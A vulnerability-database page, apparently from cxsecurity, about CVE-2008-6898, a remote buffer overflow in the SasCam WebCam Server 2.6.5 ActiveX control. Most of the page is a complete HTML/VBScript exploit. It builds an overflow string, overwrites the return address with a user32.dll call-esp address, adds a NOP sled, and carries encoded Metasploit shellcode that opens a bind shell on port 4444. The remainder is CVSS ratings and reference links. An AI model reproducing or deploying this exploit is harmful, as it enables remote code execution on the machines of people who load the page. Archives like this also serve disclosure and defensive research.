Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
SasCam WebCam Server 2.6.5 ActiveX Remote BOF Exploit
2009.08.06
Credit:
callAX
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2008-6898
CWE:
CWE-94
Ogólna skala CVSS:
9.3/10
Znaczenie:
10/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Pełny
Wpływ na integralność:
Pełny
Wpływ na dostępność:
Pełny
<!--**** --> <!--SasCam WebCam Server Version 2.6.5 Belus Technology Inc. XHTTP Module v4.1.0.0 --> <!--Remote Exploit --> <!--Tested in Windows XP SP2/SP3 IE 7.0 --> <!--C0d3d by callAX bemariani@gmail.com --> <!--4lmost all methods have a b0f <!--***** --> <!--Greetings to str0ke for being a good man, and Fr0git0 for being a Polla_Vaguito_Kid--> <!--******--> <html> <object classid='clsid:0297D24A-F425-47EE-9F3B-A459BCE593E3' id='cr4sh'></object> <input language=VBScript onclick=rootIT() type=button value="3xpl0iT-IT!"> <script language = 'vbscript'> Sub rootIT() put_s0m3_shit = String(8293, "a") eip = unescape("%EC%7E%E3%77") // call esp User32.dll Module 77 E3 7E EC noping = String(20, unescape("%90")) <!-- This exploit opens the port 4444. Thanks to Metasploit for Shellcode --> lnj3ctc0d3 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c%56%4b%4e") & _ unescape("%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42%56%4b%48") & _ unescape("%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b%58%4e%37") & _ unescape("%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a%51%4b%58") & _ unescape("%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46%53%4b%48") & _ unescape("%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46%38%42%4c") & _ unescape("%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44%4c%4b%4e") & _ unescape("%46%4f%4b%53%46%55%46%42%4a%52%45%57%45%4e%4b%58") & _ unescape("%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e%30%4b%44") & _ unescape("%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e%32%4b%48") & _ unescape("%49%38%4e%56%46%42%4e%31%41%46%43%4c%41%53%4b%4d") & _ unescape("%46%36%4b%58%43%54%42%43%4b%48%42%44%4e%50%4b%58") & _ unescape("%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50%35%4a%56") & _ unescape("%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48%4d%48%46") & _ unescape("%43%35%48%56%4a%36%43%33%44%53%4a%46%47%47%43%37") & _ unescape("%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b%4c%4d%4e") & _ unescape("%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49%48%45%4e") & _ unescape("%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c%36%44%50") & _ unescape("%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d%4a%47%55") & _ unescape("%4f%4f%48%4d%43%55%43%35%43%35%43%55%43%45%43%54") & _ unescape("%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a%56%41%41") & _ unescape("%4e%45%48%46%43%55%49%48%41%4e%45%39%4a%36%46%4a") & _ unescape("%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c%46%42%41") & _ unescape("%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d%4a%50%32") & _ unescape("%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f%4f%42%4d") & _ unescape("%4a%36%45%4e%49%34%48%48%49%54%47%45%4f%4f%48%4d") & _ unescape("%42%35%46%35%46%55%45%45%4f%4f%42%4d%43%39%4a%46") & _ unescape("%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48%4d%45%45") & _ unescape("%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a%46%43%46") & _ unescape("%4d%56%49%38%45%4e%4c%56%42%45%49%35%49%42%4e%4c") & _ unescape("%49%38%47%4e%4c%46%46%54%49%38%44%4e%41%33%42%4c") & _ unescape("%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44%44%4e%32") & _ unescape("%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b%4a%4a%46") & _ unescape("%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46%44%4f%4f") & _ unescape("%48%4d%4b%55%47%55%44%55%41%45%41%45%41%45%4c%56") & _ unescape("%41%30%41%45%41%35%45%45%41%45%4f%4f%42%4d%4a%46") & _ unescape("%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48%4d%4c%36") & _ unescape("%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47%35%4e%4f") & _ unescape("%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f%4f%42%4d") & _ unescape("%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f%4f%48%4d") & _ unescape("%4f%4f%42%4d%5a") this_is_my_gift = put_s0m3_shit + eip + noping + lnj3ctc0d3 cr4sh.Get this_is_my_gift End Sub </script> <html>
Referencje:
http://xforce.iss.net/xforce/xfdb/47654
http://www.securityfocus.com/bid/33053
http://www.milw0rm.com/exploits/7617
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top